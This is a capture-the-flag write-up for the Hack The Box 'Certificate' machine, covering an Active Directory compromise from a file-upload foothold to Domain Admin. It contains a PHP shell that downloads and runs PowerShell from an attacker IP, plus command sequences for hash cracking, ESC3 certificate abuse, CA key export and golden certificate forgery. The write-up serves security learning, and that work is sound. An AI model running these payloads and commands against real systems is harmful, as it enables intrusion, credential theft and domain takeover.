LinkedInHTB ProfileAbout

HTB - Certificate

Description

This machine showcases a multi-stage attack path beginning with remote code execution achieved through ZIP file concatenation, embedding both a PDF and a malicious PHP shell. Post-exploitation, database credentials are harvested to pivot to a second user, followed by lateral movement to a third user. The third account has certificate enrollment privileges, allowing the attacker to exploit ESC3 and escalate to a fourth user. This final user, through Active Directory group membership, holdsSeManageVolumePrivilege, which is abused to export the CA's private key. A forged golden certificate is then used to impersonate high-privileged users, ultimately leading to Domain Admin compromise.

Enumeration

I started with normal Nmap scan to find all open ports

Nmap Scan

nmap -p- --min-rate 10000 $target -Pn -oN Nmap/allports

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws

Exported all open ports to a variable and ran the script and version detection scans

export ports="$(cat Nmap/allports | grep '^[0-9]' | cut -d/ -f1 | tr "\n" "," | sed 's/,$//g')"

map -p"$ports" $target -Pn -sC -sV -oN Nmap/script-scan

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-01 06:23:50Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T06:25:22+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T06:25:23+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T06:25:22+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T06:25:23+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing

Summary

* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* Services: DNS, IIS, KERBEROS, LDAP, RPC, SMB, LDAPS, winRM
* Important notes: Domain:certificate.htb -  http://certificate.htb/

I always update /etc/hosts before I attack the domain to avoid any tooling issues

echo "$target dc01 dc01.certificate.htb certificate.htb" | sudo tee -a /etc/hosts

10.10.11.71 dc01 dc01.certificate.htb certificate.htb

I started with web server enumeration. Visiting http://certificate.htb/ gives this web page:

There were not many pages on the site. only /register, /login, /blog, contacts.php, index.php, and about.php endpoints

I wanted to log into the site, but I had to register for an account first:

Here is the successful registration message

Then, I went to log in to the site with my username & password

Landed here after logging in and saw the new endpoint /coures.php

http://certificate.htb/courses.php

I clicked on the first course and then Enroll button:

This message appeared after I clicked Enroll button and also the following section, as well

Watch button did nothing but sumbit took me to another page:

The page only accepts .zip, .pdf, .xlsx files

Foothold

After testing the function with my team, we managed to get RCE using the following technique:

The site only accepts .pdf, so creating one zip file containing .pdf and another one containing .php reverse shell

zip test1.zip file.pdf 
zip test2.zip rev.php

Reverse shell content:

cat rev.php

<?php
shell_exec("powershell -nop -w hidden -c iex(iwr 10.10.16.14/shell.ps1 -UseBasicParsing)")
?>

you can replace shell.ps1 with your desired powershell reverse shell

Then concatenated the two zip files into one:

cat test1.zip test2.zip > combined.zip

The site gave me a direct link for .pdf file

What I did was to request rev.php not file.pdf

Lateral Movement

Shell as Sara.b

Under C:\xampp\htdocs\certificate.htb, I found db.php which contains the DB connection string credentials

And I confirmed that MySQL database was running on the host

I searched for the binary mysql.exe to use it to connect to the database without the need to upload Chisel.exe and performing reverse port forwarding, and found it under C:\xammpp\mysql\bin

C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p'REDACTED' -D certificate_webapp_db -e 'show tables;'
C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p'REDACTED' -D certificate_webapp_db -e 'SELECT * FROM users;'

I found two users with @certificate.htb email in the table. Maybe they are domain users, and I could see here that Sara.B is a domain user

The hash for Sara was cracked successfully

hashcat -m 3200 hash.bcrypt /usr/share/wordlists/rockyou.txt

$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.xxxxx.xxxxxxxxxxx: RECADTED

Confirm access

nxc ldap $target -u Sara.b -p REDACTED

LDAP        10.10.11.71     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)
LDAP        10.10.11.71     389    DC01             [+] certificate.htb\Sara.b:########

With Sara credentials, I used bloodhound.py to collect domain LDAP data:

bloodhound-python -u $user -p $password -ns $target -d $domain -c all --dns-timeout 120 --zip

I also checked the share access, but didn't find anything

From BloodHound-GUII found Sara is a member of Account Operators privileged group besides other groups. With this membership, I can take over any account I want, except Administrators

This path was patched by HTB Team, So you will not see Account Operators membership. The path involved going from Sara.B to Lion.SK or Ryan.K directly

Also. Members ofHelp Desk users can access the box via winRM

There are 3 users other than xamppuser and sara have a Desktop folder on the box

Lion.SK is a member of Domain CRA Managers

BloodHound described that group:

Also, Ryan is a member of Domain Storage Managers

BloodHound described that group:

My strategy was to get either one of the two users, and might get high privileges, whether on CA as Lion or at the file system level as Ryan

First, I accessed the box via winRM as Sara

evil-winrm -i $target -u $user -p $password

Shell as Lion.SK

Then, I found those files in Documents folder

Download both files

*Evil-WinRM* PS C:\Users\Sara.B\Documents\ws-01> download WS-01_PktMon.pcap

Info: Downloading C:\Users\Sara.B\Documents\ws-01\WS-01_PktMon.pcap to WS-01_PktMon.pcap

Info: Download successful!
*Evil-WinRM* PS C:\Users\Sara.B\Documents\ws-01> download Description.txt

Info: Downloading C:\Users\Sara.B\Documents\ws-01\Description.txt to Description.txt

When I opened the .pcap file with wireshark, I saw many TCP packets, so I filtered them out, and several KRB5 packets appeared

If I could extract the full authentication process, I might be able to get a hash and try to crack it.

When I searched for a way to extract the hashes from .pcap, I found this repo

Clone the repo to my Kali

git clone https://github.com/jalvarezz13/Krb5RoastParser.git

python3 krb5_roast_parser.py WS-01_PktMon.pcap as_req > hash1
python3 krb5_roast_parser.py WS-01_PktMon.pcap as_rep > hash2
python3 krb5_roast_parser.py WS-01_PktMon.pcap tgs_rep > hash3

The first hash lacked the domain name, so it had to be modified from CERTIFICATE to CERTIFICATE.HTB

hashcat -m 19900 hash1 /usr/share/wordlists/rockyou.txt 

..snip..
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:REDACTED

Session..........: hashcat
Status...........: Cracked

Shell as Ryan.K

With Doamin CRA Managers group, I enumerated the certificate templates as Lion.SK and found one vulnerable to ESC3

certipy find -u Lion.SK@certificate.htb -p REDCATED -enabled -vulnerable -stdout

..snip..
Template Name                       : Delegated-CRA
Display Name                        : Delegated-CRA

[+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
[!] Vulnerabilities
ESC3                  : Template has Certificate Request Agent EKU set.

ESC3 vulnerabilities exploit weaknesses related to Certificate Request Agents, also known as Enrollment Agents. An Enrollment Agent is an account authorized to request certificates on behalf of other users. This functionality is legitimate in scenarios such as helpdesk staff enrolling smart cards for users or for automated certificate provisioning systems. However, if an attacker gains access to an active Enrollment Agent certificate, or if they can enroll for a new Enrollment Agent certificate due to misconfigured template permissions, they can abuse this privilege to obtain certificates for other users, including highly privileged accounts like Domain Administrators.

I used Certipy Wiki to perform the attack:

Request a certificate for lion

certipy req -u Lion.SK@certificate.htb -p $password -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'

Request a certificate as administrator Failed due to this error CERTSRV_E_UNSUPPORTED_CERT_TYPE

certipy req -u Lion.SK@certificate.htb -p $password -ca 'Certificate-LTD-CA' -template 'User' -on-behalf-of 'certificate\administrator' -pfx lion.sk.pfx

A quick search for this error showed me that the requested template (User) hasn't been published/issued by the CA, so I used certipy to find all enabled templates in the CA, and the problem was that the template User wasn't there but SignedUser instead

I modified the command and ran it again, but also failed to get a certificate for administrator account due to CERTSRV_E_SUBJECT_EMAIL_REQUIRED. The good news was when I changed the requested user to Ryan.K it worked

certipy req -u Lion.SK@certificate.htb -p $password -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of 'certificate\administrator' -pfx lion.sk.pfx

Auth as Ryan and get his hash:

certipy auth -pfx ryan.k.pfx -domain certificate.htb -dc-ip $target

Get a shell with Ryan.k And I found that he has SeManageVolumePrivilege which makes sense being a member of domain Storage Managers

evil-winrm -i $target -u ryan.K -H RECADTED

I searched on GitHub about how to abuse this privilege and I found two repos. The second one has a compiled exploit, so I used it

What the exploit does:

  • This exploit grants full permission on C:\ drive for all users on the machine.

    • Enables the privilege in the token

    • Creates handle to .\C: with SYNCHRONIZE | FILE_TRAVERSE

    • Sends the FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545

The repo author suggests adding malicious dll on this path: C:\Windows\System32\spool\drivers\x64\3 and then run specific commands to trigger it and get SYSTEM access. However, this path is not even there on the box.

Privilege Escalation

  • Alternatively, with full read permission on C:\ I could read possible files such as:

    • SAM, SYSTEM, SECURITY Hives

    • NTDS.DIT database

    • Root CA private key

On action, I got no access on all of them except Root CA private key

Here are the steps I followed to get the private key:

  1. Download the exploit and upload it to the box:

  1. Exploit and get full permission on C:\

*Evil-WinRM* PS C:\Users\Ryan.K\Documents> .\SeManageVolumeExploit.exe
Entries changed: 844

DONE

  1. Export the CA private key

certutil -exportPFX "Certificate-LTD-CA" C:\programdata\ca.pfx

With the CA private key, I can forge golden certification and access the box as an administrator.

I used this link as a reference:

Certificate authority | The Hacker Recipes

To avoid kerberos clock skew, run sudo timedatectl set-ntp off; sudo rdate -n dc01

certipy forge -ca-pfx "ca.pfx" -upn "administrator@certificate.htb" -subject "CN=Administrator,CN=Users,DC=CERTIFICATE,DC=HTB"

certipy auth -pfx administrator_forged.pfx -username 'administrator' -domain 'certificate.htb' -dc-ip $target

Get the root flag

nxc smb $target -u Administrator -H REDACTED -x 'type C:\Users\Administrator\Desktop\root.txt'

Root Flag: 19f55bf4156dxxxxxxxxxxxxxxxxxxx

PreviousHTB - VintageNextInsane

Last updated